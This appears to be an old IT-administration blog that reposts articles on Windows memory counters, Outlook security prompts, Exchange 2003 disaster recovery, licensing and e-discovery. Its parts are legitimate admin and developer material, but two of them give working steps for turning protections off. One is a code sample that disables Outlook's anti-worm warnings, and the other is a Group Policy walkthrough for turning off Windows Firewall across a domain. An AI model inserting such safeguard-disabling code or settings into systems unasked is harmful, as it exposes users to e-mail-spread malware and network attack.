         It shows how many bytes have been allocated by processes and to which the operating system has committed a RAM page frame or a page slot in the pagefile (perhaps both). As Committed Bytes grows above the amount of available RAM, paging will increase and the amount of the pagefile in use will also increase. At some point, paging activity will start to significantly impact perceived performance.

Process, Working Set, _Total - this is a measure of the amount of virtual memory in "active" use
          It shows how much RAM is required so that the actively used virtual memory for all processes is in RAM. This is always a multiple of 4,096, which is the page size used in Windows. As demand for virtual memory increases above the available RAM, the operating system will adjust how much of a process's virtual memory is in its Working Set to optimize the use of available RAM and minimize paging.

Paging File, %pagefile in use - this is a measure of how much of the pagefile is actually being used.
          This is the counter to use to determine if the pagefile is an appropriate size. If this counter gets to 100, the pagefile is completely full and things will stop working. Depending on the volatility of your workload, you probably want the pagefile large enough so that it is normally no more than 50 - 75% used.  If a lot of the pagefile is in use, having more than one on different physical disks, may improve performance.

Memory, Pages/Sec - this is one of the most misunderstood measures.
          A high value for this counter does not necessarily imply that your performance bottleneck is shortage of RAM. The operating system uses the paging system for purposes other than swapping pages due to memory over commitment.

Memory, Pages Output/Sec - this shows how many virtual memory pages were written to the pagefile to free RAM page frames for other purposes each second.
         This is the best counter to monitor if you suspect that paging is your performance bottleneck. Even if Committed Bytes is greater than the installed RAM, if Pages Output/sec is low or zero most of the time, there is not a significant performance problem from not enough RAM.

Memory, Cache Bytes
Memory, Pool Nonpaged Bytes
Memory, Pool Paged Bytes
Memory, System Code Total Bytes
Memory, System Driver Total Bytes
          The sum of these counters is a measure of how much of the 2GB of the shared part of the 4 GB virtual address space is actually in use. Use these to determine if your system is reaching one of the architectural limits discussed above.

Memory, Available MBytes - this measures how much RAM is available to satisfy demands for virtual memory (either new allocations, or for restoring a page from the pagefile).
          When RAM is in short supply (e.g. Committed Bytes is greater than installed RAM), the operating system will attempt to keep a certain fraction of installed RAM available for immediate use by copying virtual memory pages that are not in active use to the pagefile. For this reason, this counter will not go to zero and is not necessarily a good indication of whether your system is short of RAM.

APPLIES TO

•	Microsoft Windows Server 2003, Enterprise Edition (32-bit x86)
•	Microsoft Windows XP Home Edition
•	Microsoft Windows XP Tablet PC Edition
•	Microsoft Windows 2000 Enterprise Edition
•	Microsoft Windows 2000 Professional Edition
•	Microsoft Windows 2000 Standard Edition
•	Microsoft Windows Server 2003, Datacenter Edition (32-bit x86)
•	Microsoft Windows Server 2003, Standard Edition (32-bit x86)
•	Microsoft Windows Server 2003, Web Edition
•	Microsoft Windows XP Professional

Back to the top

outlook security

2008-06-03T07:13:00.000-07:00

http://office.microsoft.com/en-us/outlook/HA012299431033.aspx

I get warnings about a program accessing e-mail address information or sending e-mail on my behalf

Applies to: Microsoft Office Outlook 2007

In many cases, you can prevent these Microsoft Office Outlook 2007 security warnings by installing antivirus software and ensuring that it is updated regularly. This article explains why the security warnings appear and what the conditions must be to not get them.

In this article

Symptoms

Cause

Resolution

Symptoms

One of the following security warnings appear:

A program is trying to access e-mail address information stored in Outlook. If this is unexpected, click Deny and verify your antivirus software is up-to-date.
A program is trying to send an e-mail message on your behalf. If this is unexpected, click Deny and verify your antivirus software is up-to-date.
A program is trying to perform an action that may result in an e-mail message being sent on your behalf. If this is unexpected, click Deny and verify your antivirus software is up-to-date.

Top of Page

Cause

These security warnings appear when a program attempts to access your contact information in the Outlook Address Book, or attempts to send e-mail on your behalf. By default, only COM add-ins (COM add-in: A supplemental program that extends the capabilities of a Microsoft Office program by adding custom commands and specialized features. COM add-ins can run in one or more Office programs. COM add-ins use the file name extension .dll or .exe.) are trusted programs. Your e-mail administrator may have allowed only specific add-ins by adding them to a "Trusted add-ins" list. Any other program is not trusted, and a security warning appears because of the potential risk that the program is malicious and designed to use Outlook to spread viruses. Before this safeguard was put in place, viruses such as Melissa and ILOVEYOU were able to access Outlook and spread by sending messages to the people listed in Contacts.

Programs that start automatically It is possible that the program started automatically. For example, a program tries to automatically send an e-mail message by using the Item.Send method in the Outlook object model.

Programs that you start It is also possible that you started the program. For example, you are using a program to synchronize your PDA or mobile device with Outlook data.

Top of Page

Resolution

Resolve this security warning

If you did not expect a program to access Outlook, or if you are not sure whether the program attempting to access Outlook is trustworthy, click Deny.
If you clicked a command or started a program that you know is supposed to access Outlook data or send e-mail messages using Outlook, and you consider the program to be trustworthy, do one of the following:

Click Allow.
If you are prompted to allow access to recipient information, select the Allow access for check box, click the amount of time that you want to grant access for, and then click Allow.

Note You should pick the least amount of time necessary for the other program to access your Outlook data. If the program needs additional time, the security warning will appear again.

Prevent this security warning from appearing again

Under certain conditions, installing an antivirus program and keeping it updated regularly might prevent this security warning from appearing again. The conditions are as follows:

Your antivirus software must be compatible with Microsoft Windows XP Service Pack 2 (SP2). Check with your antivirus software vendor.
Your antivirus software must be updated regularly. Most antivirus programs enable you to get automatic updates when you are online. Check with your antivirus software vendor.
Your antivirus software is configured to share its update status with other applications. Typically, antivirus programs share their update status with other applications by default. To check the update status setting, look in the preferences or options for your antivirus program, or check with your antivirus software vendor.

Notes

Office Outlook 2007 relies on the Windows Security Center to check for the presence of the antivirus program and update its status.
If your antivirus software subscription expires or has been inactive, you might get the security warning again when a program attempts to access Outlook.

View security settings in the Trust Center

The Programmatic Access security settings in the Trust Center provide the following options:

Warn me about suspicious activity when my antivirus software is inactive or out-of-date (recommended) This is the default setting in Office Outlook 2007. Suspicious activity refers to an untrusted program attempting to access Outlook.
Always warn me about suspicious activity This is the most secure setting and you will always be prompted to make a trust decision when a program attempts to access Outlook.
Never warn me about suspicious activity (not recommended) This is the least secure setting.

To view these settings, do the following:

On the Tools menu, click Trust Center.
Click Programmatic Access.

Notes

If your computer is managed by a Microsoft Exchange administrator or a Microsoft Windows Active Directory Domain Services administrator in your organization, and the administrator changes the default setting and prevents users from making changes, the option to customize the Programmatic Access security settings will be disabled.
If your computer is not managed by an Exchange administrator or a Microsoft Windows Active Directory Domain Services administrator, and you are the Windows administrator of your computer, you can change the Programmatic Access security settings. However, this is not recommended.

outlook security manager

2008-06-03T07:12:00.000-07:00

Security Manager
for Microsoft Outlook

Add-in Express Home > Outlook Security Manager > Online Guide > A program is trying to automatically send e-mail

Outlook automation

Here you can find code samples to automate Microsoft Outlook directly with no irritating messages or prompts like a program is trying to automatically send e-mail on your behalf.

With Outlook Security Manager you will need just a few lines of code to eliminate such alerts in Outlook 2000 - 2007. VBA, VB .NET, C#, C++, Visual Basic 6, Delphi, Word MailMerge, etc. are supported.

You can find this example in the Demo Projects\SendMail subfolder of the "Outlook Security Manager" folder. It illustrates how to use Outlook Security Manager from any application that automates Outlook. With this sample project you can send e-mail messages using Microsoft Outlook as a "mail engine". In this project there is a form, a simplified copy of the Outlook Mail window, with an Outlook Security checkbox.

If you check this option, you disable Outlook Security and your application sends messages with no security warnings. Otherwise, you get a notorious security pop-up dialog box: "a program is trying to send an e-mail..."

To disable Outlook Security we use the DisableOOMWarnings property. But here is one peculiarity. To use Outlook Security Manager from inside of your Outlook Automation application you should connect it to the Outlook.Application object used in your application. So, you use the ConnectTo method of the TOlSecurityManager class. For example (you can find the following in the code below the form):

Visual Basic .NET

Dim SecurityManager As New AddinExpress.Outlook.SecurityManager

SecurityManager.ConnectTo(outlookApp)

SecurityManager.DisableOOMWarnings = True

Try

'... any action with protected objects such as contacts or items...

Finally

' In any case please remember

' to turn on Outlook Security

' after your code, since now

' it is very easy to switch it off! :-)

SecurityManager.DisableOOMWarnings = False

End Try

Dim SecurityManager As New AddinExpress.Outlook.SecurityManager

SecurityManager.ConnectTo(outlookApp)

SecurityManager.DisableOOMWarnings = True

Try

  '... any action with protected objects such as contacts or items...

Finally

  ' In any case please remember

  ' to turn on Outlook Security

  ' after your code, since now

  ' it is very easy to switch it off! :-)

  SecurityManager.DisableOOMWarnings = False

End Try

Visual Basic 6 (VBA)

OlSecurityManager.ConnectTo OutlookApp

OlSecurityManager.DisableOOMWarnings = True

On Error Goto Finally

'... any action with protected objects ...

Finally:

OlSecurityManager.DisableOOMWarnings = False

OlSecurityManager.ConnectTo OutlookApp

OlSecurityManager.DisableOOMWarnings = True

On Error Goto Finally

  '... any action with protected objects ...

Finally:

  OlSecurityManager.DisableOOMWarnings = False

Delphi

OlSecurityManager.ConnectTo(outlookApp);

OlSecurityManager.DisableOOMWarnings := True;

try

//... any action with protected objects ...

finally

OlSecurityManager.DisableOOMWarnings = False;

end;

OlSecurityManager.ConnectTo(outlookApp);

OlSecurityManager.DisableOOMWarnings := True;

try

  //... any action with protected objects ...

finally

  OlSecurityManager.DisableOOMWarnings = False;

end;

Thus, if you want to disable Outlook security, use Outlook Security Manager and call the ConnectTo method before disabling Outlook Security.

Please, make sure that you turned Outlook Security on inside the "finally" section, because Outlook Security Manager can potentially open a door for unsafe content. To avoid this you must enable Outlook security within a protected finalization code after each elementary call of the protected objects as we have showed in this example.

A program is trying to access e-mail <<

>> Deployment

Back to Outlook Security Manager homepage

restore exchange to different hardware

2008-05-30T06:41:00.000-07:00

There are several steps you will have to do if you have to restore your Exchange Server 2003 System to alternate hardware. This is very often a task if your old Exchange Server box crashed and you did not have a chance to get the same or very similar hardware back. The goal now will be restoring your Exchange Server 2003 System on new hardware that is not the same as the old. Within this article we will get a drill-down on how this works and what steps and tasks need to be done to make things run properly.

Prerequisites

In order to have a good chance of restoring your Exchange Server 2003 on alternate Hardware, you will have to have a functional backup of at least the database files of your old Exchange Server box. Other files are good to have but are not essential for a restore to alternate hardware.

The backup of the database files (*.edb and *.stm) should be from an online backup. If they are from an offline backup the restore may be harder and Microsoft itself does not support offline backups. This means it could work but you should not trust on this “should policy” and have a good and tested online backup of your information store.

If you have all transaction log files of Exchange Server 2003 from the last full backup until today or the date of the server crash and besides do not have circular logging on your stores configured you will have a good chance of restoring all your collaboration data until the date of the server crash.

Restoring the Operating System

If you have a server crash and cannot order the hardware compatible to what it was before, your very first step of the restore process is the restoration of the operating system itself.

Hopefully you will have the information you need to do this. The information is:

Name of your Computer (DNS and WINS if necessary)
IP-Address Configuration of your old server
Logical Disk Information
Level of service pack and hot fixes of your old exchange server box
Source of the software products (Exchange and Windows)

After having setup the new machine properly with the hardware configuration software of the supplier you will have to install Windows Server 2003 configuring it as closely as possible to your old configuration. If possible it should look like your old server box.

If the hardware is the same as your old system this is easier, you will just have to install Windows Server 2003 the way you want it and then restore system state.

If now your future Exchange Server 2003 box is running Windows Server 2003 properly and you do not have any critical errors or warnings in your servers’ event log, you now will have to install the appropriate service packs and hot fixes. After having done this you can now add the server itself to your Active Directory Environment.

At this step you will have a clear installation of Windows Server 2003 for your future Exchange Server 2003 box.

Restoring Exchange Server 2003

And now we come to the most interesting step of your restore process: making Exchange Server 2003 run using the databases from your crashed Exchange Server 2003 box.

If we already have a running Active Directory environment we do not have to re-add the schema entries of Exchange. This means we just have to tell our Active Directory that it has to accept our new machine as Exchange Server box and have to install Exchange Server 2003 on our new server. This can be done by using the “/disasterrecovery” switch of your Exchange Server 2003 setup, as you can see in the screenshot below.

Figure 1: Disasterrecovery Switch of Exchange Server 2003 Setup

After setup has completed, your Exchange Server files are installed on your new server box but you do not have any databases yet and be careful that Exchange Server services do not start.

The next step is, restoring your Exchange databases from backup to the new server. Now we have to restart the machine and if we are lucky, it will start. This is because there might be some dependencies upon the service packs and patches need to be installed. So the next step is installing the appropriate ones on your server.

After a final reboot everything should now be up to date and your Exchange Server should be able to start properly and behave like your old one. One thing that could now be missing is that you will have to restore some differential backups; this means that you will have to replay the transaction log files. This is quite easy and is done automatically by your backup software. If you still have to replay some transaction protocols from your old server box that have not yet been included in any backup so far you can do this manually using the ESEUTIL command line tool with the “/cc” switch.

The final step now is reviewing the event logs and solving the errors or warnings you will find there. At this step the Microsoft Knowledgebase or www.eventid.net should be your friend.

ESEUTIL and ISINTEG

If you are unsuccessful with the restore of your server so far and it is not possible to make your new Exchange Server installation run with your old databases you could try to make things work with the command line based tools ESEUTIL and ISINTEG.

ESEUTIL is an ESE engine based recovery tool and has a lot of options to restore a corrupt database. There are a lot of switches and ways that can be used starting at testing the drive integrity and ending by doing a recovery on the database that means deleting all corrupt database pages with the result that data may be lost.

ISINTEG then is a tool that really understands the database structure of Exchange databases. With this tool you can perform some tests and restorations of each Exchange database to make them run properly with Exchange Server.

For more details on ESEUTIL and ISINTEG you should check out:

http://www.msexchange.org/tutorials/Exchange-ISINTEG-ESEUTIL.html

3rd Party Software

If you are unsuccessful using the Tools for Exchange database corruption to make things work the only way to solve your problem is by using clean new databases and migrate the items to the new databases using 3rd Party Software.

You can create clean databases with a simple step. Just make sure that all Exchange Server services are stopped, and then delete all files in:

C:\Program Files\Exchsrvr\mdbdata

Then restart all Exchange Server services and try to mount the databases. This will show you an error stating that the database files are missing and asking you if Exchange Server should create new ones. Once you have done this you can start your process of a manual migration of entries from the corrupt Exchange Server databases to this new one. The very last step is now to reconfigure all mail routing configurations and that’s it.

Conclusion

In 99% of all cases you will simply be successful using this drill-down to make your Exchange Server 2003 databases and other configuration work on your new hardware. And as you can see, it is not as hard as it seems to be. Just make sure you are doing the right steps in the right order and check whether your backup runs properly. But the best would be if you never had to do a restore of your server on alternate hardware, because you should never experience this due to the right SLAs (service level agreements) with your hardware supplier.

If you do need assistance or have further questions please do not hesitate to contact me.

About Markus Klein

Markus Klein is a MCSA/MCSE Messaging & Security and Microsoft Certified Trainer. He is a Consultant and IT Senior Trainer at Bechtle AG in the northwest of Germany. He is specialized in Active Directory, Exchange, Security, ISA Server and Clustering on Windows 2000 and Windows Server 2003 designs, migrations and implementations. Markus is a graduate of economical informatics from the University of Applied Science in Osnabrueck/Germany.

Click here for Markus Klein's section.

Share this article

Receive all the latest articles by email!

Get all articles delivered directly to your mailbox as and when they are released on MSExchange.org! Choose between receiving instant updates with the Real-Time Article Update, or a monthly summary with the Monthly Article Update. Sign up to the MSExchange.org Monthly Newsletter, written by Exchange MVP Henrik Walther, containing news, the hottest tips, Exchange links of the month and much more. Subscribe today and don't miss a thing!

Latest articles by Markus Klein

timeslips

2008-05-17T13:28:00.001-07:00

This document will walk you through clearing licenses. This function enables you

to clear licenses so that you may use the license on another machine or on your

existing machine if you reinstalled Timeslips.

1. Close Timeslips, and start Station Administrator. All workstations must

close Timeslips.

***NOTE: Station Administrator can be located on the start menu under

Timeslips.

2. Select Options; Licenses in Use to open the Licenses in Use dialog box.

3. Highlight at least one license (e.g. the license for the workstation you are

moving), and click Clear.

4. When the Clear Active License prompt opens, click OK if the license(s) is

not in any other database.

5. Click OK to confirm that the selected license(s) is not in any other

database, and return to the Licenses in Use dialog box.

6. Click Done.

7. Close Station Administrator, and start Timeslips.

group policy disable windows firewall

2008-05-15T08:57:00.002-07:00

Disabling the Firewall Using Group Policy

This method is for IT administrators with administrative access to UT-managed machines that are part of a Windows 2000 or 2003 Active Directory domain.

Create a new Group Policy object, and give the object a descriptive name (for example, ITS-Turn off Windows Firewall).
Select the newly created group policy.
Right-click on the newly created policy and select Edit.
Expand the Computer Configuration folder, then the Administrative Templates folder.
Expand the Network folder, then the Network Connections folder, then the Windows Firewall folder.
Select the Standard Profile folder.
Double-click the Windows Firewall: Protect all network connections option.
Select Disabled, then click OK.
Select the Domain Profile folder.
Double-click the Windows Firewall: Protect all network connections option.
Select Disabled, then click OK.
Close the Group Policy dialog box.
In the Security Filter section, click Add.
Search for the objects that this group policy will be applied to, then click OK.
Close the Group Policy editor.

windows firewall

2008-05-15T08:57:00.001-07:00

http://technet.microsoft.com/en-us/library/bb457149.aspx

Windows Firewall Policy Settings Deployment Roadmap

This section is designed to help guide you in determining which policy settings to use based on your environment. Among the first decisions you will need to make as a Group Policy administrator is whether to turn the firewall off through Group Policy (not recommended unless you’re already using a third party host firewall). If you use Windows Firewall, you need to assess policy settings for both the domain and standard profiles. It is recommended to enable the firewall for both profiles. Typically, the domain profile might be less restrictive to allow exceptions for specific types of organization traffic. Conversely, the standard profile might be more restrictive to protect computers such as laptops that are vulnerable to threats from the Internet. In addition, you will need to assess any program or port exceptions to ensure your applications or tools work correctly. These decisions are shown in the following diagram.

Disabling Windows Firewall: Protect all network connections turns off the firewall and prevents any local administrators from turning it on using Control Panel. Both Windows Firewall and third-party firewalls can typically coexist, but you would need to configure exceptions for both firewalls. Maintaining two firewalls incurs additional management overhead and does not increase your security.

Although Windows Firewall is enabled by default in SP2, turning it on via Group Policy (enabling Windows Firewall: Protect all network connections) prevents local administrators from turning it off using the Windows Firewall component in Control Panel. In addition, enabling this policy setting also overrides an earlier related policy setting that was available in Windows XP with SP1 and Windows XP with no service packs installed: Prohibit use of Internet Connection Firewall on your DNS domain network located in Computer Configuration\Administrative Templates\Network\Network Connections.

5 Steps for E-Mail Retention

2008-04-17T12:28:00.001-07:00

5 Steps for E-Mail Retention
By CIOinsight
2006-08-02

Article Views: 151
Article Rating: / 0

The first five steps you should take to enact an e-mail archiving and retention plan.

The wrong time to enact an e-mail archiving and retention plan is after your company gets audited or sued. The best way to protect your company, of course, is by developing a plan for managing and legally deleting your data before something happens. For companies just starting to look at their e-mail data retention policies, here are five steps to follow:

1. Catalog your company's data and create a list of which backup tapes are at which storage site, says Todd Stefan, principal at Setec Investigations, a computer forensics firm in Los Angeles. Knowing where to find archives will save time when discovery deadlines loom, and you'll be able to tell a judge truthfully that you produced all the relevant data you could.

2. Suspend deletion programs as soon as a lawsuit or regulatory action is anticipated, says Dave Schultz, senior legal consultant at Kroll Ontrack. Companies sometimes get dinged on this in court. Purposefully or not, they keep backup and delete policies going when they shouldn't, and evidence gets destroyed or overwritten.

3. Be aware that your lawyer (and the judge in your case) may still be learning about how to identify and preserve electronic evidence, says George Socha, founder of Socha Consulting LLC—even though, under new federal rules coming in December, companies will be required to disclose all relevant sources of electronic evidence if they get sued. Having systems and policies for managing records should help, although Socha says he expects some "bad decisions" until the courts get more comfortable with electronic discovery. Socha and his partner, Tom Gelbmann of Gelbmann & Associates, have formed a group to set standards for electronic discovery at http://edrm.net.

4. If sued or audited, keep the information-technology group or anyone else from touching data on servers and PCs unless and until directed to do so by the corporate legal department, says Johnette Hassell, president of Electronic Evidence Retrieval LLC, a data forensics and recovery firm in New Orleans.

Technology staff may unwittingly destroy potential evidence. For example, if they copy data rather than take a forensically correct bit-by-bit image, investigators won't be able to see "all the hidden places where Windows stores data," Hassell says. In one case, a paralegal at one law firm booted a computer after the firm took custody of it, inadvertently changing the date of last access. If anyone inadvertently changes data—by rebooting a PC, or by opening or saving files—the other side can raise questions about the accuracy of the data and cast doubt on your case, Hassell says.

5. Assemble an e-discovery response team. Include a mid-level I.T. person who understands the company's daily technology operations, along with internal and external lawyers, a senior executive and, perhaps, an outside discovery expert, says Jonathan Sachs, a legal consultant at Kroll Ontrack. This team can help devise an e-discovery plan for how data will be collected, reviewed and presented to the other side should the company be faced with an audit or suit.

At Taco Bell Corp., for example, when an executive leaves, the legal—not technology—department decides whether to image that person's hard drive before the PC is reassigned, based on how high up in the company he was and whether the company will face a lawsuit in which his data would be relevant, says Cynthia Nichols, associate manager of litigation at Taco Bell.

Someone on Taco Bell's legal staff quizzes the departing employee about where, in the course of his tenure, he kept information. If a lawsuit arises, Nichols knows where to find specific data, she says: "You may not ever need the data, but you have it."

e-discovery

2008-04-17T12:26:00.001-07:00

Why should I care?
Responding can be a burden, particularly if corporate archives are poorly organized and difficult to search. Costs include the information systems expense of locating backup tapes, restoring data and extracting relevant information, as well as fees paid to lawyers for reading through thousands of pages of poorly sorted and categorized documents.

"Managing electronic discovery is probably a number-one initiative at all legal departments," says Patrick Oot, who leads an e-discovery team of three attorneys and an information-technology liaison at Verizon. "Depending on the volume of litigation an organization has, this can be one of largest line items in your [legal] budget."

In addition to contracting with service provider nMatrix for current legal data management needs, Verizon is working on a new archiving system that will make data easier to import into document review tools for lawyers, allowing the firm to manage e-discovery "much faster, much easier and at much lower cost," Oot says.

Click here to find out what happened to German investment bank WestLB after it was hit with a sex discrimination suit—and had to dig up 650,000 e-mail messages and documents.

What are the information-technology issues?

There are several:

· You should examine document and e-mail archiving technologies should be reexamined to ensure they can recover potential evidence, in addition to their backup and disaster recovery functions.

· You may need to revise document and e-mail retention policies. Unless you are in an industry such as financial services with specific regulatory requirements to keep e-mail and instant messages, you may want to delete old messages on a regular basis. However, you must have a consistent policy and be able to halt the destruction of potential evidence promptly in response to a court order.

· You should determine whether data is being retained inadvertently, perhaps on individual PCs or backups from PCs, even after it has been deleted from central corporate archives.

· You should check out e-discovery tools and services, which can help speed the recovery of data from backup tapes or other media and shorten the time required to search for relevant information.

Although suites of discovery and archiving tools are appearing on the market, you shouldn't necessarily expect the solution to come in one box. Retention policies have to be decided by management before they can be implemented in technology, for example, and the technical impact extends into existing messaging, content management and backup systems.

What if I can't produce the data?
Make sure you can point to a good reason, such as a retention policy under which data was routinely deleted. But beware of giving a judge the opportunity to think the real reason is that you're not trying hard enough. In a fraud lawsuit brought by Coleman Holdings against Morgan Stanley, a Florida judge lashed out at Morgan Stanley for fumbling the recovery of archived e-mail--and told the jury it could assume the firm was deliberately hiding evidence of guilt. In May 2005, the jury awarded $1.4 billion in damages; Morgan Stanley is appealing.

Renew Data, a compliance and e-discovery services firm that the court hired to independently examine the contents of the Morgan Stanley backup tapes, found e-mails Morgan Stanley had missed on one set of archives and more e-mails on another set of tapes that wasn't supposed to contain any e-mails at all, according to Renew Data CEO Robert Gomes.

How much of this is about e-mail?
"E-mail, right now, is the great albatross for most organizations," says John Bace, a Gartner analyst specializing in the legal and regulatory issues of information technology. Though intended for relatively informal communications, rather than official corporate record-keeping, "E-mail has developed into something more like the central nervous system of a company, something it was never intended to be," Bace explains.

As a result, litigants have latched onto e-mail as a treasure trove of information about the thoughts and intentions of company employees. "I can't think of a regulatory or litigation [action] that doesn't ask for e-mail," says UBS general counsel Toni Tomarazzo.

Making matters worse, e-mail is unstructured data, making the search for relevant information more like a Web search than a more orderly database lookup. Other forms of unstructured or semi-structured data, such as the contents of wikis and other collaboration tools, could also be targeted for discovery.

Although by policy UBS doesn't endorse individual vendors, Tomarazzo says she recommends finding a service provider that offers a turnkey suite of technologies to preserve e-mail; archive it on write-once, read-many backup media; extract messages on request; and provide review and classification tools for lawyers.

what we have here is a failure to communicate

free DNS hosting

The system cannot find the file specified when opening Excel attachment in Outlook

picture storage

How many CALs does John Smith need?

How many CALs does John Smith need?

Licensing Basics: What are CALs (Client Access Licenses)?

Licensing Basics: What are CALs (Client Access Licenses)?

Comments

How can you tell if your client has User or Device CALs for their server?

How can you tell if your client has User or Device CALs for their server?

blocking referers

public preview small business server 2008

microsoft business critical partner support

Microsoft response to Q&A in comment section (Call-Back support announcement)

bogus mx records to stop spam

defrag

track login and logoff times

FW: Stupid is as Stupid does

How A Criminal Might Infiltrate Your Network

kerio tricks

dropbox change folder

make folders easy

faster pop download sbs exchange

file splitting

explorer add-ons

23 ways to speed up XP

microsoft memory limitations

RAM, Virtual Memory, Pagefile and all that stuff

SUMMARY

MORE INFORMATION

APPLIES TO

outlook security

Symptoms

Cause

Resolution

Resolve this security warning

Prevent this security warning from appearing again

View security settings in the Trust Center

outlook security manager

Security Manager for Microsoft Outlook

Outlook automation

restore exchange to different hardware

Prerequisites

Restoring the Operating System

Restoring Exchange Server 2003

ESEUTIL and ISINTEG

3rd Party Software

Conclusion

About Markus Klein

Share this article

Receive all the latest articles by email!

Latest articles by Markus Klein

Related links

timeslips

group policy disable windows firewall

Disabling the Firewall Using Group Policy

windows firewall

http://technet.microsoft.com/en-us/library/bb457149.aspx

Windows Firewall Policy Settings Deployment Roadmap

5 Steps for E-Mail Retention

e-discovery

Security Manager
for Microsoft Outlook